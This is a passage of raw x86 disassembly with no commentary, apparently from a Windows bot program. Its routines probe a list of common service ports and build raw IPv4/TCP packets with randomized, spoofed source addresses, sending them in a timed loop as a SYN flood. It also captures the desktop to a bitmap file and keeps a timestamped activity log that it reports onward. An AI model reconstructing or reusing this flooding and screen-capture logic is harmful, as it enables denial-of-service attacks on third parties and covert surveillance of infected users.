push [ebp+var_4]
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+var_254]
push offset unk_44D080
push eax
call sub_41EA60
add esp, 1Ch
loc_4152CD: ; CODE XREF: sub_414FC9+39�j
; sub_414FC9+94�j ...
cmp [ebp+arg_20C], edi
jnz short loc_4152F5
push edi
lea eax, [ebp+var_254]
push [ebp+arg_208]
push eax
lea eax, [ebp+arg_184]
push eax
push [ebp+arg_0]
call sub_409C75
add esp, 14h
loc_4152F5: ; CODE XREF: sub_414FC9+30A�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_4152FC: ; CODE XREF: sub_414FC9+289�j
push [ebp+var_4]
push esi
call ds:dword_4E2F5C ; WSAGetLastError
push eax
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+var_254]
push offset unk_44D0E8
push eax
call sub_41EA60
add esp, 18h
jmp short loc_4152CD
sub_414FC9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415321 proc near ; DATA XREF: sub_401C87+640E�o
var_414 = byte ptr -414h
var_214 = dword ptr -214h
var_210 = byte ptr -210h
var_190 = byte ptr -190h
var_110 = byte ptr -110h
var_90 = byte ptr -90h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 414h
mov eax, [ebp+arg_0]
push esi
push edi
mov ecx, 85h
mov esi, eax
lea edi, [ebp+var_214]
rep movsd
loc_41533E: ; DATA XREF: _2:00454880�o
mov dword ptr [eax+210h], 1
lea eax, [ebp+var_110]
push eax
call sub_41E710
pop ecx
loc_415355: ; DATA XREF: _2:00454A6C�o
push eax
lea eax, [ebp+var_190]
push eax
call sub_41E710
pop ecx
push eax
lea eax, [ebp+var_210]
push eax
call ds:dword_4E3008 ; inet_addr
push eax
call sub_4154BB
push eax
lea eax, [ebp+var_414]
push offset unk_44D174
push eax
call sub_41EA60
xor esi, esi
add esp, 18h
cmp [ebp+var_8], esi
jnz short loc_4153B3
push esi
lea eax, [ebp+var_414]
push [ebp+var_C]
push eax
lea eax, [ebp+var_90]
push eax
push [ebp+var_214]
call sub_409C75
add esp, 14h
loc_4153B3: ; CODE XREF: sub_415321+70�j
lea eax, [ebp+var_414]
push eax
call sub_415A3C
push [ebp+var_10]
call sub_40B9A7
pop ecx
pop ecx
push esi
call ds:dword_4F53A0 ; ExitThread
pop edi
pop esi
sub_415321 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4153D2 proc near ; CODE XREF: sub_4154BB+18C�p
var_210 = dword ptr -210h
var_20C = dword ptr -20Ch
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 210h
and [ebp+var_4], 0
cmp [ebp+arg_C], 0
push esi
push edi
jnz short loc_4153FB
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4F5530 ; connect
jmp loc_4154B7
; ---------------------------------------------------------------------------
loc_4153FB: ; CODE XREF: sub_4153D2+13�j
mov esi, [ebp+arg_0]
lea eax, [ebp+var_8]
xor edi, edi
push eax
inc edi
push 8004667Eh
push esi
mov [ebp+var_8], edi
call ds:dword_4F5514 ; ioctlsocket
push [ebp+arg_8]
push [ebp+arg_4]
push esi
call ds:dword_4E2F70 ; connect
push [ebp+arg_C]
lea eax, [ebp+var_210]
mov [ebp+var_108], esi
mov [ebp+var_10C], edi
push 0
push eax
lea eax, [ebp+var_10C]
mov [ebp+var_20C], esi
push eax
lea eax, [esi+1]
push eax
mov [ebp+var_210], edi
call ds:dword_4E2FB0 ; select
test eax, eax
jnz short loc_41545F
or eax, 0FFFFFFFFh
jmp short loc_4154B7
; ---------------------------------------------------------------------------
loc_41545F: ; CODE XREF: sub_4153D2+86�j
or edi, 0FFFFFFFFh
cmp eax, edi
jnz short loc_41546A
loc_415466: ; CODE XREF: sub_4153D2+B8�j
; sub_4153D2+DC�j
mov eax, edi
jmp short loc_4154B7
; ---------------------------------------------------------------------------
loc_41546A: ; CODE XREF: sub_4153D2+92�j
lea eax, [ebp+var_10C]
push eax
push esi
call sub_43A942 ; __WSAFDIsSet
test eax, eax
jnz short loc_41548C
lea eax, [ebp+var_210]
push eax
push esi
call sub_43A942 ; __WSAFDIsSet
test eax, eax
jz short loc_415466
loc_41548C: ; CODE XREF: sub_4153D2+A7�j
lea eax, [ebp+arg_0]
mov [ebp+arg_0], 4
push eax
lea eax, [ebp+var_4]
push eax
push 1007h
push 0FFFFh
push esi
call ds:dword_4F54FC ; getsockopt
cmp eax, edi
jz short loc_415466
mov eax, [ebp+var_4]
neg eax
sbb eax, eax
loc_4154B7: ; CODE XREF: sub_4153D2+24�j
; sub_4153D2+8B�j ...
pop edi
pop esi
leave
retn
sub_4153D2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4154BB proc near ; CODE XREF: sub_415321+51�p
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_104 = dword ptr -104h
var_100 = byte ptr -100h
var_9C = word ptr -9Ch
var_9A = word ptr -9Ah
var_98 = dword ptr -98h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10Ch
push ebx
push esi
xor esi, esi
push edi
inc esi
xor ebx, ebx
push esi
push ebx
push ebx
push 0FFh
push 3
push 2
mov [ebp+var_14], esi
call ds:dword_4F5524 ; WSASocketA
lea ecx, [ebp+var_14]
push 4
push ecx
push 2
push ebx
push eax
mov ds:dword_4E67D0, eax
call ds:dword_4E2FA8 ; setsockopt
call ds:dword_4F537C ; GetTickCount
push eax
call sub_41EB60
pop ecx
xor eax, eax
push 19h
lea edi, [ebp+var_100]
pop ecx
mov [ebp+var_10C], ebx
mov [ebp+var_7C], ecx
mov [ebp+var_108], ebx
mov [ebp+var_104], ebx
mov [ebp+var_8C], 401h
mov [ebp+var_88], 15h
mov [ebp+var_84], 16h
mov [ebp+var_80], 17h
mov [ebp+var_78], 35h
mov [ebp+var_74], 50h
mov [ebp+var_70], 51h
mov [ebp+var_6C], 58h
mov [ebp+var_68], 6Eh
mov [ebp+var_64], 71h
mov [ebp+var_60], 77h
mov [ebp+var_5C], 87h
mov [ebp+var_58], 89h
mov [ebp+var_54], 8Bh
mov [ebp+var_50], 8Fh
mov [ebp+var_4C], 1BBh
mov [ebp+var_48], 1BDh
mov [ebp+var_44], 400h
mov [ebp+var_40], 599h
mov [ebp+var_3C], 5DCh
mov [ebp+var_38], 6B8h
mov [ebp+var_34], 0CEAh
mov [ebp+var_30], 0D3Dh
mov [ebp+var_2C], 1388h
mov [ebp+var_28], 1A0Bh
mov [ebp+var_24], 1F40h
mov [ebp+var_20], 1F90h
rep stosd
mov [ebp+var_C], ebx
mov [ebp+var_1C], 3
mov [ebp+var_18], 0BB8h
mov [ebp+var_4], ebx
loc_4155FF: ; CODE XREF: sub_4154BB+1B9�j
mov eax, [ebp+arg_0]
mov [ebp+var_9C], 2
mov [ebp+var_98], eax
mov eax, [ebp+var_4]
lea edi, [ebp+eax+var_8C]
mov ax, [edi]
push eax
call ds:dword_4E2FC8 ; htons
push ebx
push esi
push 2
mov [ebp+var_9A], ax
call ds:dword_4E3048 ; socket
lea ecx, [ebp+var_1C]
mov [ebp+var_8], eax
push ecx
lea ecx, [ebp+var_9C]
push 10h
push ecx
push eax
call sub_4153D2
add esp, 10h
mov [ebp+var_10], eax
push [ebp+var_8]
call ds:dword_4E3060 ; closesocket
cmp [ebp+var_10], ebx
jnz short loc_41566C
mov ecx, [ebp+var_4]
mov eax, [edi]
mov [ebp+ecx+var_10C], eax
loc_41566C: ; CODE XREF: sub_4154BB+1A3�j
add [ebp+var_4], 4
cmp [ebp+var_4], 70h
jl short loc_4155FF
mov esi, offset dword_4E67D8
push offset asc_44D1A0 ; " "
push esi
call sub_41EA60
mov edi, ds:dword_4F537C
pop ecx
pop ecx
call edi ; GetTickCount
mov [ebp+var_8], eax
mov [ebp+var_4], ebx
loc_415696: ; CODE XREF: sub_4154BB+232�j
call edi ; GetTickCount
sub eax, [ebp+var_8]
xor edx, edx
mov ecx, 3E8h
div ecx
cmp eax, [ebp+arg_4]
ja short loc_4156EF
mov eax, [ebp+var_4]
mov eax, [ebp+eax*4+var_10C]
cmp eax, ebx
jz short loc_4156CC
push eax
push esi
push offset aSD_2 ; "%s%d "
push esi
mov [ebp+var_C], eax
call sub_41EA60
add esp, 10h
jmp short loc_4156E6
; ---------------------------------------------------------------------------
loc_4156CC: ; CODE XREF: sub_4154BB+1FA�j
push 0FFFFh
push ebx
call sub_419313
pop ecx
pop ecx
push eax
call ds:dword_4E2FC8 ; htons
movzx eax, ax
mov [ebp+var_C], eax
loc_4156E6: ; CODE XREF: sub_4154BB+20F�j
inc [ebp+var_4]
cmp [ebp+var_4], 1Ch
jl short loc_415696
loc_4156EF: ; CODE XREF: sub_4154BB+1EC�j
; sub_4154BB+45C�j
push 28h
push ebx
push offset byte_4E6774
call sub_41E4B0
mov esi, 0FFFFh
mov ds:byte_4E6774, 45h
push esi
push 400h
mov ds:byte_4E677D, 6
mov ds:byte_4E6775, 8
call sub_419313
add esp, 14h
push eax
call ds:dword_4E2FC8 ; htons
push 28h
mov ds:word_4E6778, ax
call ds:dword_4E2FC8 ; htons
or ds:byte_4E677C, 0FFh
cmp ds:dword_4E676C, ebx
mov ds:word_4E6776, ax
mov ds:word_4E677A, bx
jnz short loc_415760
push [ebp+arg_0]
call sub_415926
pop ecx
jmp short loc_41576B
; ---------------------------------------------------------------------------
loc_415760: ; CODE XREF: sub_4154BB+298�j
push offset dword_4E6150
call ds:dword_4E3008 ; inet_addr
loc_41576B: ; CODE XREF: sub_4154BB+2A3�j
mov ds:dword_4E6780, eax
mov eax, [ebp+arg_0]
push 4000h
mov ds:dword_4E6784, eax
mov ds:byte_4E6795, bl
call ds:dword_4E2FC8 ; htons
push esi
push ebx
mov ds:word_4E6796, ax
call sub_419313
mov edi, eax
push esi
push ebx
shl edi, 8
call sub_419313
add esp, 10h
add edi, eax
push edi
call ds:dword_4E2FC4 ; htonl
mov ds:dword_4E678C, eax
mov al, ds:byte_4E6794
mov edi, [ebp+arg_0]
and al, 0Fh
or al, 50h
push 14h
mov ds:byte_4E6794, al
mov ax, word ptr [ebp+var_C]
mov ds:dword_4E6790, ebx
mov ds:word_4E679A, bx
mov ds:word_4E678A, ax
mov ds:dword_4E67B0, edi
mov ds:byte_4E67B4, bl
mov ds:byte_4E67B5, 6
call ds:dword_4E2FC8 ; htons
mov ds:word_4E67B6, ax
mov ax, ds:word_4E678A
mov ds:word_4E679C, 2
mov ds:dword_4E67A0, edi
mov ds:word_4E679E, ax
mov [ebp+var_4], ebx
jmp short loc_415821
; ---------------------------------------------------------------------------
loc_41581C: ; CODE XREF: sub_4154BB+436�j
mov esi, 0FFFFh
loc_415821: ; CODE XREF: sub_4154BB+35F�j
cmp [ebp+var_4], ebx
push esi
push ebx
jnz short loc_415855
call sub_419313
pop ecx
pop ecx
push eax
call ds:dword_4E2FC8 ; htons
mov ds:word_4E6788, ax
mov eax, ds:dword_4E6780
mov ds:dword_4E67AC, eax
mov ds:byte_4E6795, 2
mov ds:dword_4E6790, ebx
jmp short loc_415872
; ---------------------------------------------------------------------------
loc_415855: ; CODE XREF: sub_4154BB+36B�j
mov ds:byte_4E6795, 10h
call sub_419313
pop ecx
pop ecx
push eax
call ds:dword_4E2FC8 ; htons
movzx eax, ax
mov ds:dword_4E6790, eax
loc_415872: ; CODE XREF: sub_4154BB+398�j
inc ds:word_4E6778
inc ds:dword_4E678C
mov ax, ds:word_4E678A
push 5
pop ecx
mov esi, offset word_4E6788
mov edi, offset dword_4E67B8
mov ds:word_4E677E, bx
mov ds:word_4E6798, bx
push 14h
rep movsd
mov esi, offset byte_4E6774
mov ds:word_4E679E, ax
push esi
call sub_40AF06
push 20h
push offset dword_4E67AC
mov ds:word_4E677E, ax
call sub_40AF06
add esp, 10h
mov ds:word_4E6798, ax
push 10h
push offset word_4E679C
push ebx
push 28h
push esi
push ds:dword_4E67D0
call ds:dword_4E302C ; sendto
inc [ebp+var_4]
cmp [ebp+var_4], 3FFh
jl loc_41581C
call ds:dword_4F537C ; GetTickCount
sub eax, [ebp+var_8]
xor edx, edx
mov ecx, 3E8h
div ecx
cmp eax, [ebp+arg_4]
ja short loc_41591C
push [ebp+arg_8]
call ds:dword_4F534C ; Sleep
jmp loc_4156EF
; ---------------------------------------------------------------------------
loc_41591C: ; CODE XREF: sub_4154BB+451�j
pop edi
pop esi
mov eax, offset dword_4E67D8
pop ebx
leave
retn
sub_4154BB endp
; =============== S U B R O U T I N E =======================================
sub_415926 proc near ; CODE XREF: sub_4154BB+29D�p
arg_0 = dword ptr 4
push 0FFFEh
push 1
call sub_419313
pop ecx
pop ecx
mov ecx, [esp+arg_0]
shl eax, 10h
and ecx, 0FFFFh
or eax, ecx
retn
sub_415926 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415944 proc near ; CODE XREF: sub_401C87+7269�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push esi
push edi
mov esi, offset dword_455180
mov edi, 0B8h
loc_415958: ; CODE XREF: sub_415944+33�j
cmp byte ptr [esi], 0
jz short loc_41597B
push [ebp+arg_0]
push esi
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz short loc_41597B
inc [ebp+var_4]
add esi, edi
cmp esi, offset dword_455D00
jl short loc_415958
jmp short loc_4159BD
; ---------------------------------------------------------------------------
loc_41597B: ; CODE XREF: sub_415944+17�j
; sub_415944+26�j
mov esi, [ebp+var_4]
push ebx
imul esi, 0B8h
push edi
push 0
lea ebx, dword_455180[esi]
push ebx
call sub_41E4B0
push 17h
push [ebp+arg_0]
push ebx
call sub_41E510
push 9Fh
lea eax, dword_455198[esi]
push [ebp+arg_4]
push eax
call sub_41E510
add esp, 24h
inc ds:dword_43FA40
pop ebx
loc_4159BD: ; CODE XREF: sub_415944+35�j
mov eax, [ebp+var_4]
pop edi
pop esi
leave
retn
sub_415944 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4159C4 proc near ; CODE XREF: sub_401C87+289D�p
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 200h
push esi
push edi
push 0
push [ebp+arg_8]
push offset dword_44D1AC
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409C75
add esp, 14h
xor edi, edi
mov esi, offset dword_455180
loc_4159EE: ; CODE XREF: sub_4159C4+72�j
cmp byte ptr [esi], 0
jz short loc_415A29
lea eax, [esi+18h]
push eax
push esi
push edi
push offset dword_44D1C0
lea eax, [ebp+var_200]
push 200h
push eax
call sub_41EC30
push 1
lea eax, [ebp+var_200]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409C75
add esp, 2Ch
loc_415A29: ; CODE XREF: sub_4159C4+2D�j
add esi, 0B8h
inc edi
cmp esi, offset dword_455D00
jl short loc_4159EE
pop edi
pop esi
leave
retn
sub_4159C4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415A3C proc near ; CODE XREF: sub_401404+372�p
; sub_401404+3F3�p ...
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_A = word ptr -0Ah
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = word ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
lea eax, [ebp+var_10]
push edi
push eax
call ds:dword_4F5404 ; GetLocalTime
mov ebx, offset dword_4EABD8
mov edi, 80h
mov esi, offset dword_4E6BD8
loc_415A5E: ; CODE XREF: sub_415A3C+3D�j
cmp byte ptr [ebx], 0
jz short loc_415A75
push 7Fh
lea eax, [ebx+80h]
push ebx
push eax
call sub_41E510
add esp, 0Ch
loc_415A75: ; CODE XREF: sub_415A3C+25�j
sub ebx, edi
cmp ebx, esi
jge short loc_415A5E
movzx eax, [ebp+var_4]
push [ebp+arg_0]
push eax
movzx eax, [ebp+var_6]
push eax
movzx eax, [ebp+var_8]
push eax
movzx eax, [ebp+var_10]
push eax
movzx eax, [ebp+var_A]
push eax
movzx eax, [ebp+var_E]
push eax
push offset a_2d_2d4d_2d_2d ; "[%.2d-%.2d-%4d %.2d:%.2d:%.2d] %s"
push edi
push esi
call sub_41EC30
add esp, 28h
pop edi
pop esi
pop ebx
leave
retn
sub_415A3C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415AB0 proc near ; CODE XREF: sub_4019A5+F7�p
; sub_401C87:loc_40220D�p ...
var_80 = byte ptr -80h
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
sub esp, 80h
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+var_80]
push [ebp+arg_0]
push 80h
push eax
call sub_41F9C0
lea eax, [ebp+var_80]
push eax
call sub_415A3C
add esp, 14h
leave
retn
sub_415AB0 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
xor ebx, ebx
cmp [ebp+14h], ebx
push esi
mov dword ptr [ebp-8], 80h
mov [ebp-4], ebx
jnz short loc_415B0B
push ebx
push dword ptr [ebp+10h]
push offset dword_44D1F8
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call sub_409C75
add esp, 14h
loc_415B0B: ; CODE XREF: _0:00415AF2�j
cmp [ebp+18h], ebx
jz short loc_415B23
push dword ptr [ebp+18h]
call sub_41E710
cmp eax, ebx
pop ecx
mov [ebp-4], eax
jz short loc_415B23
mov [ebp-8], eax
loc_415B23: ; CODE XREF: _0:00415B0E�j _0:00415B1E�j
mov [ebp+14h], ebx
mov esi, offset dword_4E6BD8
loc_415B2B: ; CODE XREF: _0:00415B73�j
mov eax, [ebp+14h]
cmp eax, [ebp-8]
jge short loc_415B75
cmp [esi], bl
jz short loc_415B64
cmp [ebp+18h], ebx
jz short loc_415B50
cmp [ebp-4], ebx
jnz short loc_415B50
push dword ptr [ebp+18h]
push esi
call sub_418B5C
pop ecx
test eax, eax
pop ecx
jz short loc_415B64
loc_415B50: ; CODE XREF: _0:00415B3A�j _0:00415B3F�j
push 1
push dword ptr [ebp+10h]
push esi
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call sub_409C75
add esp, 14h
loc_415B64: ; CODE XREF: _0:00415B35�j _0:00415B4E�j
inc dword ptr [ebp+14h]
add esi, 80h
cmp esi, offset dword_4EABD8
jl short loc_415B2B
loc_415B75: ; CODE XREF: _0:00415B31�j
pop esi
pop ebx
leave
retn
; =============== S U B R O U T I N E =======================================
sub_415B79 proc near ; CODE XREF: sub_401C87+2798�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
mov eax, offset dword_4E6BD8
xor ecx, ecx
loc_415B80: ; CODE XREF: sub_415B79+13�j
mov [eax], cl
add eax, 80h
cmp eax, offset dword_4EABD8
jl short loc_415B80
cmp [esp+arg_C], ecx
jnz short loc_415BAE
push ecx
push [esp+4+arg_8]
push offset dword_44D204
push [esp+0Ch+arg_4]
push [esp+10h+arg_0]
call sub_409C75
add esp, 14h
loc_415BAE: ; CODE XREF: sub_415B79+19�j
push offset dword_44D218
call sub_415A3C
pop ecx
retn
sub_415B79 endp
; ---------------------------------------------------------------------------
push esi
mov esi, offset dword_4E6BD8
loc_415BC0: ; CODE XREF: _0:00415BE1�j
cmp byte ptr [esi], 0
jz short loc_415BD5
push dword ptr [esp+8]
push esi
call sub_418B5C
pop ecx
test eax, eax
pop ecx
jnz short loc_415BE7
loc_415BD5: ; CODE XREF: _0:00415BC3�j
add esi, 80h
cmp esi, offset dword_4EABD8
jl short loc_415BC0
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_415BE7: ; CODE XREF: _0:00415BD3�j
xor eax, eax
pop esi
inc eax
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415BEC proc near ; DATA XREF: sub_401C87+2848�o
var_31C = byte ptr -31Ch
var_11C = dword ptr -11Ch
var_118 = byte ptr -118h
var_98 = byte ptr -98h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 31Ch
mov eax, [ebp+arg_0]
push esi
push edi
push 45h
pop ecx
mov esi, eax
lea edi, [ebp+var_11C]
xor edx, edx
rep movsd
xor edi, edi
mov [ebp+var_8], 80h
inc edi
cmp [ebp+var_10], edx
mov [ebp+var_4], edx
mov [eax+110h], edi
jnz short loc_415C3F
push edx
lea eax, [ebp+var_118]
push [ebp+var_14]
push offset dword_44D22C
push eax
push [ebp+var_11C]
call sub_409C75
add esp, 14h
loc_415C3F: ; CODE XREF: sub_415BEC+33�j
cmp [ebp+var_98], 0
jz short loc_415C5F
lea eax, [ebp+var_98]
push eax
call sub_41E710
test eax, eax
pop ecx
mov [ebp+var_4], eax
jz short loc_415C5F
mov [ebp+var_8], eax
loc_415C5F: ; CODE XREF: sub_415BEC+5A�j
; sub_415BEC+6E�j
and [ebp+arg_0], 0
mov esi, offset dword_4E6BD8
loc_415C68: ; CODE XREF: sub_415BEC+D4�j
mov eax, [ebp+arg_0]
cmp eax, [ebp+var_8]
jge short loc_415CC2
cmp byte ptr [esi], 0
jz short loc_415CB1
cmp [ebp+var_98], 0
jz short loc_415C97
cmp [ebp+var_4], 0
jnz short loc_415C97
lea eax, [ebp+var_98]
push eax
push esi
call sub_418B5C
pop ecx
test eax, eax
pop ecx
jz short loc_415CB1
loc_415C97: ; CODE XREF: sub_415BEC+90�j
; sub_415BEC+96�j
push edi
lea eax, [ebp+var_118]
push [ebp+var_14]
push esi
push eax
push [ebp+var_11C]
call sub_409C75
add esp, 14h
loc_415CB1: ; CODE XREF: sub_415BEC+87�j
; sub_415BEC+A9�j
inc [ebp+arg_0]
add esi, 80h
cmp esi, offset dword_4EABD8
jl short loc_415C68
loc_415CC2: ; CODE XREF: sub_415BEC+82�j
lea eax, [ebp+var_31C]
push offset dword_44D248
push eax
call sub_41EA60
xor esi, esi
pop ecx
cmp [ebp+var_10], esi
pop ecx
jnz short loc_415CFC
push esi
lea eax, [ebp+var_31C]
push [ebp+var_14]
push eax
lea eax, [ebp+var_118]
push eax
push [ebp+var_11C]
call sub_409C75
add esp, 14h
loc_415CFC: ; CODE XREF: sub_415BEC+EE�j
lea eax, [ebp+var_31C]
push eax
call sub_415A3C
push [ebp+var_18]
call sub_40B9A7
pop ecx
pop ecx
push esi
call ds:dword_4F53A0 ; ExitThread
pop edi
pop esi
sub_415BEC endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415D1B proc near ; CODE XREF: sub_401C87+73A7�p
var_484 = byte ptr -484h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_78 = word ptr -78h
var_76 = word ptr -76h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = word ptr -4Ch
var_4A = word ptr -4Ah
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = word ptr -30h
var_2E = dword ptr -2Eh
var_2A = word ptr -2Ah
var_28 = word ptr -28h
var_26 = dword ptr -26h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 484h
push ebx
push esi
xor esi, esi
push edi
push esi
push esi
push esi
push offset aDisplay ; "DISPLAY"
call ds:dword_4E2FB4 ; CreateDCA
mov edi, eax
cmp edi, esi
mov [ebp+var_20], edi
jz loc_415F4F
push 8
push edi
call ds:dword_4E2FD0 ; GetDeviceCaps
push 0Ah
push edi
mov [ebp+var_8], eax
call ds:dword_4E2FD0 ; GetDeviceCaps
push 0Ch
push edi
mov [ebp+var_C], eax
call ds:dword_4E2FD0 ; GetDeviceCaps
cmp eax, 8
mov [ebp+var_10], eax
ja short loc_415D7D
push 18h
push edi
call ds:dword_4E2FD0 ; GetDeviceCaps
mov ebx, 100h
jmp short loc_415D7F
; ---------------------------------------------------------------------------
loc_415D7D: ; CODE XREF: sub_415D1B+50�j
xor ebx, ebx
loc_415D7F: ; CODE XREF: sub_415D1B+60�j
push edi
call ds:dword_4E3014 ; CreateCompatibleDC
cmp eax, esi
mov [ebp+var_4], eax
jz loc_415F34
mov eax, [ebp+var_8]
push esi
mov [ebp+var_80], eax
mov eax, [ebp+var_C]
mov [ebp+var_7C], eax
mov ax, word ptr [ebp+var_10]
mov [ebp+var_76], ax
lea eax, [ebp+var_18]
push esi
push eax
lea eax, [ebp+var_84]
push 1
push eax
push edi
mov [ebp+var_84], 28h
mov [ebp+var_78], 1
mov [ebp+var_74], esi
mov [ebp+var_70], esi
mov [ebp+var_6C], esi
mov [ebp+var_68], esi
mov [ebp+var_64], ebx
mov [ebp+var_60], ebx
call ds:dword_4E300C ; CreateDIBSection
cmp eax, esi
mov [ebp+var_1C], eax
jz loc_415F3F
push eax
push [ebp+var_4]
call ds:dword_4E2E98 ; SelectObject
cmp eax, esi
jz loc_415F3F
cmp eax, 0FFFFFFFFh
jz loc_415F3F
push 0CC0020h
push esi
push esi
push edi
push [ebp+var_C]
push [ebp+var_8]
push esi
push esi
push [ebp+var_4]
call ds:dword_4E3010 ; BitBlt
test eax, eax
jz loc_415F3F
cmp ebx, esi
jz short loc_415E3C
lea eax, [ebp+var_484]
push eax
push ebx
push esi
push [ebp+var_4]
call ds:dword_4E2EEC ; GetDIBColorTable
mov ebx, eax
loc_415E3C: ; CODE XREF: sub_415D1B+10B�j
mov edi, [ebp+var_10]
mov ecx, [ebp+var_8]
imul edi, [ebp+var_C]
imul edi, ecx
mov eax, ebx
push esi
shr edi, 3
shl eax, 2
mov [ebp+var_8], eax
push 80h
lea edx, [eax+edi+36h]
add eax, 36h
push 2
mov [ebp+var_26], eax
mov eax, [ebp+var_C]
push esi
push esi
push 40000000h
push [ebp+arg_0]
mov [ebp+var_50], eax
mov ax, word ptr [ebp+var_10]
mov [ebp+var_30], 4D42h
mov [ebp+var_2E], edx
mov [ebp+var_2A], si
mov [ebp+var_28], si
mov [ebp+var_58], 28h
mov [ebp+var_54], ecx
mov [ebp+var_4C], 1
mov [ebp+var_4A], ax
mov [ebp+var_48], esi
mov [ebp+var_44], esi
mov [ebp+var_40], esi
mov [ebp+var_3C], esi
mov [ebp+var_38], ebx
mov [ebp+var_34], esi
call ds:off_4F53C0
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz short loc_415F1F
lea ecx, [ebp+var_14]
push esi
push ecx
lea ecx, [ebp+var_30]
push 0Eh
push ecx
push eax
call ds:dword_4F53B4 ; WriteFile
lea eax, [ebp+var_14]
push esi
push eax
lea eax, [ebp+var_58]
push 28h
push eax
push [ebp+arg_0]
call ds:dword_4F53B4 ; WriteFile
cmp ebx, esi
jz short loc_415F01
lea eax, [ebp+var_14]
push esi
push eax
lea eax, [ebp+var_484]
push [ebp+var_8]
push eax
push [ebp+arg_0]
call ds:dword_4F53B4 ; WriteFile
loc_415F01: ; CODE XREF: sub_415D1B+1CC�j
lea eax, [ebp+var_14]
push esi
push eax
push edi
push [ebp+var_18]
push [ebp+arg_0]
call ds:dword_4F53B4 ; WriteFile
push [ebp+arg_0]
call ds:off_4F533C
xor esi, esi
inc esi
loc_415F1F: ; CODE XREF: sub_415D1B+1A2�j
push [ebp+var_1C]
call ds:dword_4E2F24 ; DeleteObject
push [ebp+var_4]
call ds:dword_4E2E84 ; DeleteDC
mov edi, [ebp+var_20]
loc_415F34: ; CODE XREF: sub_415D1B+70�j
push edi
call ds:dword_4E2E84 ; DeleteDC
mov eax, esi
jmp short loc_415F51
